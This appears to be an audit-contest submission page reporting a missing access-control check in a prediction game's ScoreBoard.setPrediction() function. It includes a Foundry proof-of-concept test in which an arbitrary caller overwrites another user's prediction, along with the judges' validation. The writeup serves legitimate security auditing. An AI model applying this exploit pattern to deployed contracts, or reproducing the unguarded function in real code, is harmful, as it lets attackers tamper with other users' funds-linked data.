First Flight #20: The Predicter

First Flight #20

Beginner FriendlyFoundry

100 EXP

View results

Previous Next

Submission Details

Severity: high

Valid

A User's Prediction Can Be Changed By Arbitrary Caller

evmninja

Summary

Function ScoreBoard.setPrediction() does not have access control such that it allows arbitrary caller to change a user's prediction.

Vulnerability Details

Function ScoreBoard.setPrediction() can be used by a user to modify their prediction, as long as the time frame allows for it.
However, it does not have access control such that the user's prediction can be changed by any caller.

Impact

A malicious party can change users' prediction at will during allowable time frame.

Tools Used

Testing and manual review.

Recommendations

Consider implementing the following measurements:

check that the caller is legit, e.g., by checking if they have paid the prediction fee.
only allows setting own prediction.

Proof of Concept

The issue can be demonstrated using the following test:

function test_evmn_setPrediction_POC_set_other_user(address user, uint256 target_user_index, uint256 matchNumber) public {

// Bound

matchNumber = bound(matchNumber, 0, 8);

target_user_index = bound(target_user_index, 0, users.length - 1);

ScoreBoard.Result result = ScoreBoard.Result.First;

// All user sets prediction

for (uint256 i = 0; i < users.length; i++) {

if (i == target_user_index) {

continue;

}

deal(users[i], thePredicter.predictionFee());

vm.startPrank(users[i]);

thePredicter.makePrediction{value: thePredicter.predictionFee()}(matchNumber, result);

vm.stopPrank();

}

address target_user = users[target_user_index];

// Set prediction of target user by some random user

vm.startPrank(user);

scoreBoard.setPrediction(target_user, matchNumber, result);

vm.stopPrank();

}

Updates

Lead Judging Commences

NightHawK Lead Judge over 1 year ago

Submission Judgement Published

Validated

Assigned finding tags:

setPrediction lacks access control

setPrediction has no access control and allows manipulation to Players' predictions.

Rewards breakdown

nSLOC

191

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.